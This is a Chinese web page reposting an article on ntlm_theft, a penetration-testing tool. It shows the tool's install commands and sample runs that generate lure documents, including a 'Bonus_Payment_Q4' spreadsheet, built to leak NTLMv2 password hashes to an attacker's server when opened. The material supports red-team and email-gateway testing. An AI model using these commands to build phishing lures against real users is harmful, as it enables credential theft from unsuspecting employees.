文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件

2024-12-02 19:32

关注

[[429931]]

使用场景

ntlm_theft主要针对渗透测试人员和红队研究人员设计,可以帮助研究人员对目标公司员工进行内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果外网防火墙上允许出站SMB访问,则它也可用于外部网络钓鱼。

工具依赖

ntlm_theft基于Python 3开发,因此我们需要在本地环境安装并配置好Python 3环境,并安装好xlsxwriter:

  1. pip3 install xlsxwriter 

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/Greenwolf/ntlm_theft.git 

工具参数

ntlm_theft的运行需要提供四个必要参数,一个输入格式,输入文件或目录,以及基础的运行模式:

工具运行

下面给出的工具演示样例中,我们将使用ntlm_theft生成所有文件:

  1. # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test 
  2.  
  3. Created: test/test.scf (BROWSE) 
  4.  
  5. Created: test/test-(url).url (BROWSE) 
  6.  
  7. Created: test/test-(icon).url (BROWSE) 
  8.  
  9. Created: test/test.rtf (OPEN) 
  10.  
  11. Created: test/test-(stylesheet).xml (OPEN) 
  12.  
  13. Created: test/test-(fulldocx).xml (OPEN) 
  14.  
  15. Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: test/test-(includepicture).docx (OPEN) 
  18.  
  19. Created: test/test-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: test/test-(frameset).docx (OPEN) 
  22.  
  23. Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  24.  
  25. Created: test/test.asx (OPEN) 
  26.  
  27. Created: test/test.jnlp (OPEN) 
  28.  
  29. Created: test/test.application (DOWNLOAD AND OPEN) 
  30.  
  31. Created: test/test.pdf (OPEN AND ALLOW) 
  32.  
  33. Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) 
  34.  
  35. Generation Complete. 

在下面的工具使用样例中,我们将使用ntlm_theft仅生成现代文件:

  1. # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting 
  2.  
  3. Skipping SCF as it does not work on modern Windows 
  4.  
  5. Created: meeting/meeting-(url).url (BROWSE TO FOLDER) 
  6.  
  7. Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) 
  8.  
  9. Created: meeting/meeting.rtf (OPEN) 
  10.  
  11. Created: meeting/meeting-(stylesheet).xml (OPEN) 
  12.  
  13. Created: meeting/meeting-(fulldocx).xml (OPEN) 
  14.  
  15. Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: meeting/meeting-(includepicture).docx (OPEN) 
  18.  
  19. Created: meeting/meeting-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: meeting/meeting-(frameset).docx (OPEN) 
  22.  
  23. Created: meeting/meeting-(externalcell).xlsx (OPEN) 
  24.  
  25. Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  26.  
  27. Created: meeting/meeting.asx (OPEN) 
  28.  
  29. Created: meeting/meeting.jnlp (OPEN) 
  30.  
  31. Created: meeting/meeting.application (DOWNLOAD AND OPEN) 
  32.  
  33. Created: meeting/meeting.pdf (OPEN AND ALLOW) 
  34.  
  35. Skipping zoom as it does not work on the latest versions 
  36.  
  37. Skipping Autorun.inf as it does not work on modern Windows 
  38.  
  39. Skipping desktop.ini as it does not work on modern Windows 
  40.  
  41. Generation Complete. 

在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:

  1. # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 
  2.  
  3. Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) 
  4.  
  5. Generation Complete. 

工具运行截图

项目地址

ntlm_theft:【GitHub传送门

 

来源:FreeBuf内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯